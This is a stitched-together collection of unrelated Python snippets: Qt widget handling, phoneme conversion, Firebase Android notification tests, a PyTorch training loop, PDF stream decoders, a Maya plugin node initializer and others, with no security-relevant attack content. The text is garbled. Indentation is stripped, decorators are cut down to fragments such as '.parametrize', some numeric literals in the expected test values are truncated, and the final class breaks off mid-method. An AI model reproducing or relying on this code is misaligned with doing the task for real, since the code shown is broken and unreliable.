self.caseSelectionChanged.emit()
def removeWidget(self, widget):
self.__case_layout.removeWidget(widget)
del self.__case_selectors[widget]
self.__case_selectors_order.remove(widget)
widget.setParent(None)
self.caseSelectionChanged.emit()
self.checkCaseCount() |
def g2p(text):
phones = []
tones = []
word2ph = []
words = re.split('([,;.\\-\\?\\!\\s+])', text)
words = [word for word in words if (word.strip() != '')]
for word in words:
if (word.upper() in eng_dict):
(phns, tns) = refine_syllables(eng_dict[word.upper()])
phones += phns
tones += tns
word2ph.append(len(phns))
else:
phone_list = list(filter((lambda p: (p != ' ')), _g2p(word)))
for ph in phone_list:
if (ph in arpa):
(ph, tn) = refine_ph(ph)
phones.append(ph)
tones.append(tn)
else:
phones.append(ph)
tones.append(0)
word2ph.append(len(phone_list))
phones = [post_replace_ph(i) for i in phones]
phones = ((['_'] + phones) + ['_'])
tones = (([0] + tones) + [0])
word2ph = (([1] + word2ph) + [1])
return (phones, tones, word2ph) |
class Column(Options):
def cellType(self):
return self._config_get()
def cellType(self, val):
self._config(val)
def className(self):
return EnumStyleOptions(self, 'className')
def contentPadding(self):
return self._config_get()
def contentPadding(self, val):
self._config(val)
def defaultContent(self):
return self._config_get()
def defaultContent(self, val):
self._config(val)
def name(self):
return self._config_get()
def name(self, val):
self._config(val)
def title(self):
return self._config_get()
def title(self, val):
self._config(val)
def style(self):
return self._config_get()
def style(self, val):
self._config(val)
def orderable(self):
return self._config_get()
def orderable(self, val):
self._config(val)
def orderData(self):
return self._config_get()
def orderData(self, val):
self._config(val)
def orderDataType(self):
return self._config_get()
def orderDataType(self, val):
self._config(val)
def orderSequence(self):
return self._config_get()
def orderSequence(self, val):
self._config(val)
def render(self):
return self._config_get()
def render(self, val):
self._config(val)
def data(self):
return self._config_get()
def data(self, val):
self._config(val)
def searchable(self):
return self._config_get()
def searchable(self, val):
self._config(val)
def visible(self):
return self._config_get()
def visible(self, val):
self._config(val)
def width(self):
return self._config_get()
def width(self, val):
self._config(val) |
def extractMyoniyoniTranslations(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Prince of the Octagon', 'Prince of the Octagon', 'translated'), ('Beautiful Top Star', 'Beautiful Top Star', 'translated'), ('Swordmaster Healer', 'Swordmaster Healer', 'translated'), ('Valhalla Saga', 'Valhalla Saga', 'translated'), ('Top Management', 'Top Management', 'translated'), ('The King of the Battlefield', 'The King of the Battlefield', 'translated'), ('Sovereign of Judgement', 'Sovereign of Judgement', 'translated'), ('Taming Master', 'Taming Master', 'translated'), ("God's Song", "God's Song", 'translated'), ('Life Mission', 'Life Mission', 'translated'), ('Demon King & Hero', 'Demon King & Hero', 'translated'), ('Sovereign of Judgment', 'Sovereign of Judgment', 'translated'), ('God of Tennis', 'God of Tennis', 'translated'), ('Kill the Hero', 'Kill the Hero', 'translated'), ('Grand Slam', 'Grand Slam', 'translated'), ('The Overlord of Blood and Iron', 'The Overlord of Blood and Iron', 'translated'), ('Spirit Sword', 'Spirit Sword', 'translated'), ('The Legendary Engie', 'The Legendary Engie', 'translated'), ('Suspicious Manager Moon', 'Suspicious Manager Moon', 'translated'), ('Absolute on the Mound', 'Absolute on the Mound', 'translated'), ("I Became the Hero's Bride", "I Became the Hero's Bride", 'translated')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
train_loss = 0
for (batch_idx, (data, target)) in enumerate(train_loader):
(data, target) = (data.to(device), target.to(device))
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if ((batch_idx % args.log_interval) == 0):
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, (batch_idx * len(data)), len(train_loader.dataset), ((100.0 * batch_idx) / len(train_loader)), loss.item()))
if args.dry_run:
break
train_loss += (loss.item() * len(data))
return (train_loss / len(train_loader.dataset)) |
def show_poly(canvas, path=[(0, 0), (20, 0), (10, 20), (0, 0)], xoff=0, yoff=0):
tuplepath = translate_poly(path, xoff, yoff)
p = Points(tuplepath)
poly = Polyline(parent=canvas, points=p, line_width=0.5, stroke_color='black')
idx = 1
for C in path:
text = Text(parent=canvas, text=idx, font='4', fill_color='blue')
idx += 1
text.translate(((C[0] + xoff) + random.uniform((- 0.5), 0)), ((C[1] + yoff) + random.uniform((- 0.5), 0)))
text.scale(0.25, 0.25) |
def test_shell_script():
t = ShellTask(name='test2', debug=True, script_file=script_sh, inputs=kwtypes(f=CSVFile, y=FlyteDirectory, j=datetime.datetime), output_locs=[OutputLocation(var='x', var_type=FlyteDirectory, location='{inputs.y}'), OutputLocation(var='z', var_type=FlyteFile, location='{inputs.f}.pyc')])
assert (t.script_file == script_sh)
t(f=test_csv, y=testdata, j=datetime.datetime(2021, 11, 10, 12, 15, 0)) |
('twilio_user_update', [SaaSRequestType.UPDATE])
def twilio_user_update(client: AuthenticatedClient, param_values_per_row: List[Dict[(str, Any)]], policy: Policy, privacy_request: PrivacyRequest, secrets: Dict[(str, Any)]) -> int:
rows_updated = 0
for row_param_values in param_values_per_row:
user_id = row_param_values.get('sid')
masked_object_fields = row_param_values['masked_object_fields']
for k in masked_object_fields.copy().keys():
new_key = to_pascal_case(k)
masked_object_fields[new_key] = masked_object_fields.pop(k)
update_body = masked_object_fields
client.send(SaaSRequestParams(method=HTTPMethod.POST, path=f'/v1/Users/{user_id}', headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=multidimensional_urlencode(update_body)))
rows_updated += 1
return rows_updated |
def get_package_info(path: str) -> PackageInfo:
try:
prev = os.getcwd()
path = os.path.abspath(path)
os.chdir(path)
(out, _err) = run_python_script(cmd=[f'{path}/setup.py', '--version'], allow_warnings=True)
local_version: Version = parse_version(out)
(package_name, _err) = run_python_script(cmd=[f'{path}/setup.py', '--name'], allow_warnings=True)
finally:
os.chdir(prev)
remote_metadata = get_metadata(package_name)
latest = get_releases(remote_metadata)[(- 1)]
return PackageInfo(name=package_name, local_version=local_version, latest_version=latest) |
class TestAndroidNotificationEncoder():
def _check_notification(self, notification):
with pytest.raises(ValueError) as excinfo:
check_encoding(messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=notification)))
return excinfo
.parametrize('data', NON_OBJECT_ARGS)
def test_invalid_android_notification(self, data):
with pytest.raises(ValueError) as excinfo:
check_encoding(messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=data)))
expected = 'AndroidConfig.notification must be an instance of AndroidNotification class.'
assert (str(excinfo.value) == expected)
.parametrize('data', NON_STRING_ARGS)
def test_invalid_title(self, data):
notification = messaging.AndroidNotification(title=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.title must be a string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_body(self, data):
notification = messaging.AndroidNotification(body=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.body must be a string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_icon(self, data):
notification = messaging.AndroidNotification(icon=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.icon must be a string.')
.parametrize('data', (NON_STRING_ARGS + ['foo', '#xxyyzz', '112233', '#11223']))
def test_invalid_color(self, data):
notification = messaging.AndroidNotification(color=data)
excinfo = self._check_notification(notification)
if isinstance(data, str):
assert (str(excinfo.value) == 'AndroidNotification.color must be in the form #RRGGBB.')
else:
assert (str(excinfo.value) == 'AndroidNotification.color must be a non-empty string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_sound(self, data):
notification = messaging.AndroidNotification(sound=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.sound must be a string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_tag(self, data):
notification = messaging.AndroidNotification(tag=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.tag must be a string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_click_action(self, data):
notification = messaging.AndroidNotification(click_action=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.click_action must be a string.')
.parametrize('data', NON_STRING_ARGS)
def test_invalid_title_loc_key(self, data):
notification = messaging.AndroidNotification(title_loc_key=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.title_loc_key must be a string.')
.parametrize('data', NON_LIST_ARGS)
def test_invalid_title_loc_args(self, data):
notification = messaging.AndroidNotification(title_loc_key='foo', title_loc_args=data)
excinfo = self._check_notification(notification)
if isinstance(data, list):
expected = 'AndroidNotification.title_loc_args must not contain non-string values.'
assert (str(excinfo.value) == expected)
else:
expected = 'AndroidNotification.title_loc_args must be a list of strings.'
assert (str(excinfo.value) == expected)
def test_no_title_loc_key(self):
notification = messaging.AndroidNotification(title_loc_args=['foo'])
excinfo = self._check_notification(notification)
expected = 'AndroidNotification.title_loc_key is required when specifying title_loc_args.'
assert (str(excinfo.value) == expected)
.parametrize('data', NON_STRING_ARGS)
def test_invalid_body_loc_key(self, data):
notification = messaging.AndroidNotification(body_loc_key=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.body_loc_key must be a string.')
.parametrize('data', NON_LIST_ARGS)
def test_invalid_body_loc_args(self, data):
notification = messaging.AndroidNotification(body_loc_key='foo', body_loc_args=data)
excinfo = self._check_notification(notification)
if isinstance(data, list):
expected = 'AndroidNotification.body_loc_args must not contain non-string values.'
assert (str(excinfo.value) == expected)
else:
expected = 'AndroidNotification.body_loc_args must be a list of strings.'
assert (str(excinfo.value) == expected)
def test_no_body_loc_key(self):
notification = messaging.AndroidNotification(body_loc_args=['foo'])
excinfo = self._check_notification(notification)
expected = 'AndroidNotification.body_loc_key is required when specifying body_loc_args.'
assert (str(excinfo.value) == expected)
.parametrize('data', NON_STRING_ARGS)
def test_invalid_channel_id(self, data):
notification = messaging.AndroidNotification(channel_id=data)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.channel_id must be a string.')
.parametrize('timestamp', [100, '', 'foo', {}, [], list(), dict()])
def test_invalid_event_timestamp(self, timestamp):
notification = messaging.AndroidNotification(event_timestamp=timestamp)
excinfo = self._check_notification(notification)
expected = 'AndroidNotification.event_timestamp must be a datetime.'
assert (str(excinfo.value) == expected)
.parametrize('priority', (NON_STRING_ARGS + ['foo']))
def test_invalid_priority(self, priority):
notification = messaging.AndroidNotification(priority=priority)
excinfo = self._check_notification(notification)
if isinstance(priority, str):
if (not priority):
expected = 'AndroidNotification.priority must be a non-empty string.'
else:
expected = 'AndroidNotification.priority must be "default", "min", "low", "high" or "max".'
else:
expected = 'AndroidNotification.priority must be a non-empty string.'
assert (str(excinfo.value) == expected)
.parametrize('visibility', (NON_STRING_ARGS + ['foo']))
def test_invalid_visibility(self, visibility):
notification = messaging.AndroidNotification(visibility=visibility)
excinfo = self._check_notification(notification)
if isinstance(visibility, str):
if (not visibility):
expected = 'AndroidNotification.visibility must be a non-empty string.'
else:
expected = 'AndroidNotification.visibility must be "private", "public" or "secret".'
else:
expected = 'AndroidNotification.visibility must be a non-empty string.'
assert (str(excinfo.value) == expected)
.parametrize('vibrate_timings', ['', 1, True, 'msec', ['500', 500], [0, 'abc']])
def test_invalid_vibrate_timings_millis(self, vibrate_timings):
notification = messaging.AndroidNotification(vibrate_timings_millis=vibrate_timings)
excinfo = self._check_notification(notification)
if isinstance(vibrate_timings, list):
expected = 'AndroidNotification.vibrate_timings_millis must not contain non-number values.'
else:
expected = 'AndroidNotification.vibrate_timings_millis must be a list of numbers.'
assert (str(excinfo.value) == expected)
def test_negative_vibrate_timings_millis(self):
notification = messaging.AndroidNotification(vibrate_timings_millis=[100, (- 20), 15])
excinfo = self._check_notification(notification)
expected = 'AndroidNotification.vibrate_timings_millis must not be negative.'
assert (str(excinfo.value) == expected)
.parametrize('notification_count', ['', 'foo', list(), tuple(), dict()])
def test_invalid_notification_count(self, notification_count):
notification = messaging.AndroidNotification(notification_count=notification_count)
excinfo = self._check_notification(notification)
assert (str(excinfo.value) == 'AndroidNotification.notification_count must be a number.')
def test_android_notification(self):
msg = messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=messaging.AndroidNotification(title='t', body='b', icon='i', color='#112233', sound='s', tag='t', click_action='ca', title_loc_key='tlk', body_loc_key='blk', title_loc_args=['t1', 't2'], body_loc_args=['b1', 'b2'], channel_id='c', ticker='ticker', sticky=True, event_timestamp=datetime.datetime(2019, 10, 20, 15, 12, 23, 123, tzinfo=datetime.timezone(datetime.timedelta(hours=(- 5)))), local_only=False, priority='high', vibrate_timings_millis=[100, 50, 250], default_vibrate_timings=False, default_sound=True, light_settings=messaging.LightSettings(color='#AABBCCDD', light_on_duration_millis=200, light_off_duration_millis=300), default_light_settings=False, visibility='public', notification_count=1)))
expected = {'topic': 'topic', 'android': {'notification': {'title': 't', 'body': 'b', 'icon': 'i', 'color': '#112233', 'sound': 's', 'tag': 't', 'click_action': 'ca', 'title_loc_key': 'tlk', 'body_loc_key': 'blk', 'title_loc_args': ['t1', 't2'], 'body_loc_args': ['b1', 'b2'], 'channel_id': 'c', 'ticker': 'ticker', 'sticky': True, 'event_time': '2019-10-20T20:12:23.000123Z', 'local_only': False, 'notification_priority': 'PRIORITY_HIGH', 'vibrate_timings': ['0.s', '0.s', '0.s'], 'default_vibrate_timings': False, 'default_sound': 1, 'light_settings': {'color': {'red': 0., 'green': 0., 'blue': 0.8, 'alpha': 0.}, 'light_on_duration': '0.s', 'light_off_duration': '0.s'}, 'default_light_settings': False, 'visibility': 'PUBLIC', 'notification_count': 1}}}
check_encoding(msg, expected)
def test_android_notification_naive_event_timestamp(self):
event_time = datetime.datetime.now()
msg = messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=messaging.AndroidNotification(title='t', event_timestamp=event_time)))
expected = {'topic': 'topic', 'android': {'notification': {'title': 't', 'event_time': event_time.strftime('%Y-%m-%dT%H:%M:%S.%fZ')}}}
check_encoding(msg, expected) |
def stop_message_live_location(token, chat_id=None, message_id=None, inline_message_id=None, reply_markup=None, timeout=None):
method_url = 'stopMessageLiveLocation'
payload = {}
if chat_id:
payload['chat_id'] = chat_id
if message_id:
payload['message_id'] = message_id
if inline_message_id:
payload['inline_message_id'] = inline_message_id
if reply_markup:
payload['reply_markup'] = _convert_markup(reply_markup)
if timeout:
payload['timeout'] = timeout
return _make_request(token, method_url, params=payload) |
def test_serialize_refs_roundtrip_bytes():
fwd = (lambda model, X, is_train: (X, (lambda dY: dY)))
model_a = Model('a', fwd)
model = Model('test', fwd, refs={'a': model_a, 'b': None}).initialize()
with pytest.raises(ValueError):
model.to_bytes()
model = Model('test', fwd, refs={'a': model_a, 'b': None}, layers=[model_a])
assert (model.ref_names == ('a', 'b'))
model_bytes = model.to_bytes()
with pytest.raises(ValueError):
Model('test', fwd).from_bytes(model_bytes)
new_model = Model('test', fwd, layers=[model_a])
new_model.from_bytes(model_bytes)
assert (new_model.ref_names == ('a', 'b')) |
def defilterData(filtername, stream, params=None):
logger.debug(('Filtering stream with %s' % repr((filtername, params))))
if (filtername == 'FlateDecode'):
return FlateDecode(params).decode(stream)
elif (filtername == 'LZWDecode'):
return LZWDecode(params).decode(stream)
elif (filtername == 'ASCIIHexDecode'):
return ASCIIHexDecode(params).decode(stream)
elif (filtername == 'ASCII85Decode'):
return ASCII85Decode(params).decode(stream)
elif (filtername == 'RunLengthDecode'):
return RunLengthDecode(params).decode(stream) |
class CO2eqParametersAll(unittest.TestCase):
modes: set[str] = get_possible_modes()
parameters = CO2EQ_PARAMETERS
def check_valid_ratios_list(ratios):
assert (len(ratios) >= 1)
def check_power_origin_ratios(cls, callback1, callback2):
fallback_zone_mixes = cls.parameters['fallbackZoneMixes']
for (zone, mixes) in (('defaults', fallback_zone_mixes['defaults']), *fallback_zone_mixes['zoneOverrides'].items()):
ratios = mixes['powerOriginRatios']
if isinstance(ratios, list):
cls.check_valid_ratios_list(ratios)
for ratio in ratios:
callback1(ratio, zone)
else:
callback2(ratios, zone)
def check_contributions(cls, contribution_name, callback):
contributions = cls.parameters[contribution_name]
for (zone, modes_to_contributions) in (('defaults', contributions['defaults']), *contributions['zoneOverrides'].items()):
for (mode, c) in modes_to_contributions.items():
callback(mode, c, zone)
def check_is_renewable(cls, callback):
cls.check_contributions('isRenewable', callback)
def check_is_low_carbon(cls, callback):
cls.check_contributions('isLowCarbon', callback)
def test_power_origin_modes_are_valid(self):
def callback(ratio_, zone):
for (mode, ratio) in ratio_['value'].items():
if isinstance(ratio, numbers.Number):
self.assertIn(mode, self.modes, msg=f"zone '{zone}' contains an invalid mode")
self.check_power_origin_ratios(callback, callback)
def test_power_origin_ratio_annual_lists_have_valid_dates(self):
def callback(ratio, _zone):
datetime.datetime.fromisoformat(ratio['datetime'])
self.check_power_origin_ratios(callback, (lambda ratio, zone: None))
def test_power_origin_ratios_sum_to_1(self):
def callback(ratio, zone):
values = ratio['value'].values()
self.assertAlmostEqual(1.0, sum((v for v in values if isinstance(v, numbers.Number))), msg=f"zone '{zone}' ratios do not sum to (approximately) 1.0", places=2)
self.check_power_origin_ratios(callback, callback)
def test_required_keys_are_present(self):
def callback1(ratio, _zone):
self.assertIn('datetime', ratio, msg='lists of power origin ratios must include datetimes')
self.assertIn('value', ratio)
def callback2(ratio, _zone):
self.assertIn('value', ratio)
self.assertIn('fallbackZoneMixes', self.parameters)
fallback_zone_mixes = self.parameters['fallbackZoneMixes']
self.assertIn('defaults', fallback_zone_mixes)
self.assertIn('powerOriginRatios', fallback_zone_mixes['defaults'])
self.assertIn('zoneOverrides', fallback_zone_mixes)
for (zone, mixes) in (('defaults', fallback_zone_mixes['defaults']), *fallback_zone_mixes['zoneOverrides'].items()):
self.assertIn('powerOriginRatios', mixes, msg=f"key missing from zone '{zone}'")
self.check_power_origin_ratios(callback1, callback2)
def check_contribution_object(self, contribution, zone, mode, contribution_name):
self.assertIn('value', contribution.keys(), msg=f"zone '{zone}' does not contain a value for {contribution_name} contribution for mode {mode}")
self.assertTrue((0 <= contribution['value'] <= 1), msg=f"zone '{zone}' contains an invalid {contribution_name} contribution for mode {mode}")
def check_contribution_datetimes(self, contribution, zone, mode, contribution_name):
dts = []
try:
dts = [c['datetime'] for c in contribution]
except KeyError:
self.assertTrue(False, msg=f"zone '{zone}' is missing datetimes for the {contribution_name} contributions for mode {mode}")
try:
dts = [datetime.datetime.fromisoformat(dt) for dt in dts]
except ValueError:
self.assertTrue(False, msg=f"zone '{zone}' contains invalid datetimes for the {contribution_name} contributions for mode {mode}")
self.assertEqual(dts, sorted(dts), msg=f"zone '{zone}' datetimes for the {contribution_name} contributions for mode {mode} are not ordered")
def test_is_renewable_valid_datetimes(self):
def callback(mode, contribution, zone):
if isinstance(contribution, list):
self.check_contribution_datetimes(contribution, zone, mode, 'isRenewable')
self.check_is_renewable(callback)
def test_is_renewable_valid_contributions(self):
contribution_name = 'isRenewable'
def callback(mode, contribution, zone):
if isinstance(contribution, list):
for c in contribution:
self.check_contribution_object(c, zone, mode, contribution_name)
else:
self.check_contribution_object(contribution, zone, mode, contribution_name)
self.check_is_renewable(callback)
def test_is_low_carbon_valid_datetimes(self):
def callback(mode, contribution, zone):
if isinstance(contribution, list):
self.check_contribution_datetimes(contribution, zone, mode, 'isLowCarbon')
self.check_is_low_carbon(callback)
def test_is_low_carbon_valid_contributions(self):
contribution_name = 'isLowCarbon'
def callback(mode, contribution, zone):
if isinstance(contribution, list):
for c in contribution:
self.check_contribution_object(c, zone, mode, contribution_name)
else:
self.check_contribution_object(contribution, zone, mode, contribution_name)
self.check_is_low_carbon(callback) |
def test_layout_evol(node):
if hasattr(node, 'collapsed'):
if (node.collapsed == 1):
node.img_style['draw_descendants'] = False
if node.is_leaf:
if hasattr(node, 'sequence'):
seqface = SequenceFace(node.sequence, 'aa', codon=node.nt_sequence, fsize=10, col_w=11, interactive=True)
faces.add_face_to_node(seqface, node, 1, aligned=True) |
class SlotDescriptionsGenerator():
def generate_all_same_angles(self, sections, thickness, extra_slack, depth, height, angle, radius=2):
width = (thickness + extra_slack)
descriptions = SlottedEdgeDescriptions()
first_correction = 0
current_section = 0
if (sections[0] == 0):
slot = SlotDescription(width, depth=depth, angle=angle, start_radius=0, end_radius=radius)
descriptions.add(slot)
first_correction = slot.round_edge_end_correction()
current_section += 1
first_length = sections[current_section]
current_section += 1
descriptions.add(StraightEdgeDescription(first_length, round_edge_compensation=first_correction))
for l in sections[current_section:]:
slot = SlotDescription(width, depth=depth, angle=angle, radius=radius)
previous_edge = descriptions.get_last_edge()
previous_edge.round_edge_compensation += slot.round_edge_start_correction()
descriptions.add(slot)
descriptions.add(StraightEdgeDescription(l, slot.round_edge_end_correction()))
end_length = (height * math.tan(math.radians(angle)))
descriptions.get_last_edge().angle_compensation += end_length
return descriptions |
def test_require4(evmtester, branch_results):
evmtester.requireBranches(4, False, False, False, False)
results = branch_results()
for i in [1453, 1484, 1524, 1530, 1555, 1561]:
assert ([i, (i + 1)] in results[True])
with pytest.raises(VirtualMachineError):
evmtester.requireBranches(4, False, True, False, False)
results = branch_results()
for i in [1453, 1484, 1524]:
assert ([i, (i + 1)] in results[True])
assert ([1530, 1531] in results[False])
with pytest.raises(VirtualMachineError):
evmtester.requireBranches(4, True, False, False, False)
results = branch_results()
for i in [1459, 1490]:
assert ([i, (i + 1)] in results[True])
for i in [1453, 1484, 1524]:
assert ([i, (i + 1)] in results[False]) |
def test_dependency_resolution_4():
a1 = Thing('a1.js', ['b1.js'])
b1 = Thing('b1.js', ['c1.js'])
c1 = Thing('c1.js', ['d1.js'])
d1 = Thing('d1.js', ['e1.js', 'a1.js'])
e1 = Thing('e1.js', [])
aa = (a1, b1, c1, d1, e1)
with raises(RuntimeError):
aa = solve_dependencies(aa) |
class ElectionSchema(ma.Schema):
candidate_id = ma.fields.Str()
candidate_name = ma.fields.Str()
incumbent_challenge_full = ma.fields.Str()
party_full = ma.fields.Str()
committee_ids = ma.fields.List(ma.fields.Str)
candidate_pcc_id = ma.fields.Str(doc="The candidate's primary campaign committee ID")
candidate_pcc_name = ma.fields.Str(doc="The candidate's primary campaign committee name")
total_receipts = ma.fields.Float()
total_disbursements = ma.fields.Float()
cash_on_hand_end_period = ma.fields.Float()
candidate_election_year = ma.fields.Int()
coverage_end_date = ma.fields.Date() |
def nodeInitializer():
nAttr = OpenMaya.MFnNumericAttribute()
tAttr = OpenMaya.MFnTypedAttribute()
cAttr = OpenMaya.MFnCompoundAttribute()
eAttr = OpenMaya.MFnEnumAttribute()
oyBallisticRuler.aStartPosX = nAttr.create('startPosX', 'spx', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosX)
oyBallisticRuler.aStartPosY = nAttr.create('startPosY', 'spy', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosY)
oyBallisticRuler.aStartPosZ = nAttr.create('startPosZ', 'spz', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosZ)
oyBallisticRuler.aStartPos = nAttr.create('startPos', 'sp', oyBallisticRuler.aStartPosX, oyBallisticRuler.aStartPosY, oyBallisticRuler.aStartPosZ)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPos)
oyBallisticRuler.aEndPosX = nAttr.create('endPosX', 'epx', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosX)
oyBallisticRuler.aEndPosY = nAttr.create('endPosY', 'epy', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosY)
oyBallisticRuler.aEndPosZ = nAttr.create('endPosZ', 'epz', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosZ)
oyBallisticRuler.aEndPos = nAttr.create('endPos', 'ep', oyBallisticRuler.aEndPosX, oyBallisticRuler.aEndPosY, oyBallisticRuler.aEndPosZ)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPos)
oyBallisticRuler.aFrameInterval = nAttr.create('frameInterval', 'fi', OpenMaya.MFnNumericData.kInt)
nAttr.setKeyable(True)
nAttr.setMin(1)
nAttr.setDefault(1)
oyBallisticRuler.addAttribute(oyBallisticRuler.aFrameInterval)
oyBallisticRuler.aVelocityVectorX = nAttr.create('velocityVectorX', 'vvx', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorX)
oyBallisticRuler.aVelocityVectorY = nAttr.create('velocityVectorY', 'vvy', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorY)
oyBallisticRuler.aVelocityVectorZ = nAttr.create('velocityVectorZ', 'vvz', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorZ)
oyBallisticRuler.aVelocityVector = nAttr.create('velocityVector', 'vv', oyBallisticRuler.aVelocityVectorX, oyBallisticRuler.aVelocityVectorY, oyBallisticRuler.aVelocityVectorZ)
nAttr.setKeyable(True)
nAttr.setDefault(0.0, 1.0, 0.0)
oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVector)
oyBallisticRuler.aSpeed = nAttr.create('speed', 'spd', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
nAttr.setDefault(1.0)
oyBallisticRuler.addAttribute(oyBallisticRuler.aSpeed)
oyBallisticRuler.aScale = nAttr.create('scale', 's', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
nAttr.setDefault(1.0)
oyBallisticRuler.addAttribute(oyBallisticRuler.aScale)
oyBallisticRuler.aGravity = nAttr.create('gravity', 'g', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
nAttr.setDefault(9.81)
oyBallisticRuler.addAttribute(oyBallisticRuler.aGravity)
oyBallisticRuler.aFrameRate = nAttr.create('frameRate', 'fr', OpenMaya.MFnNumericData.kFloat)
nAttr.setKeyable(True)
nAttr.setDefault(25.0)
oyBallisticRuler.addAttribute(oyBallisticRuler.aFrameRate)
oyBallisticRuler.aMode = eAttr.create('mode', 'm')
eAttr.addField('Start-End-Time', 0)
eAttr.addField('Start-Vel-Time', 1)
eAttr.addField('End-Vel-Time', 2)
eAttr.setKeyable(False)
eAttr.setChannelBox(True)
oyBallisticRuler.addAttribute(oyBallisticRuler.aMode)
oyBallisticRuler.aInput = cAttr.create('input', 'in')
cAttr.addChild(oyBallisticRuler.aStartPos)
cAttr.addChild(oyBallisticRuler.aEndPos)
cAttr.addChild(oyBallisticRuler.aFrameInterval)
cAttr.addChild(oyBallisticRuler.aVelocityVector)
cAttr.addChild(oyBallisticRuler.aScale)
cAttr.addChild(oyBallisticRuler.aGravity)
cAttr.addChild(oyBallisticRuler.aFrameRate)
cAttr.addChild(oyBallisticRuler.aMode)
oyBallisticRuler.addAttribute(oyBallisticRuler.aInput)
defaultVectorArray = OpenMaya.MVectorArray()
vectorArrayDataFn = OpenMaya.MFnVectorArrayData()
vectorArrayDataFn.create(defaultVectorArray)
oyBallisticRuler.aTPos = tAttr.create('trajectoryPosition', 'tp', OpenMaya.MFnData.kVectorArray, vectorArrayDataFn.object())
tAttr.setWritable(False)
tAttr.setStorable(False)
oyBallisticRuler.addAttribute(oyBallisticRuler.aTPos)
oyBallisticRuler.aOutput = cAttr.create('output', 'op')
cAttr.addChild(oyBallisticRuler.aTPos)
oyBallisticRuler.addAttribute(oyBallisticRuler.aOutput)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aStartPos, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aEndPos, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aFrameInterval, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aVelocityVector, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aSpeed, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aScale, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aGravity, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aFrameRate, oyBallisticRuler.aTPos)
oyBallisticRuler.attributeAffects(oyBallisticRuler.aMode, oyBallisticRuler.aTPos) |
def _zip(lines1, lines2, offset):
n = max(len(lines1), len(lines2))
nchars = len(lines1[0])
while (len(lines1) < n):
lines1.append((' ' * nchars))
while (len(lines2) < n):
lines2.append((' ' * nchars))
text = ''
i = 0
for (line1, line2) in zip(lines1, lines2):
if (i > 0):
text += (' ' * offset)
i += 1
text += (((line1 + ' ') + line2) + '\n')
return text |
class ImportPackagesD3Exts():
def __init__(self, js: dict, css: dict, links: Optional[dict]=None):
self._js = js
self._css = css
self.__linked = links
def get(self, name: str):
if (name in self.__linked):
return self.__linked[name]
return ImportModule(name, self._js, self._css, self.__linked)
def tip(self) -> ImportModule:
return self.get('d3-tip')
def axis(self) -> ImportModule:
return self.get('d3-axis')
def ease(self) -> ImportModule:
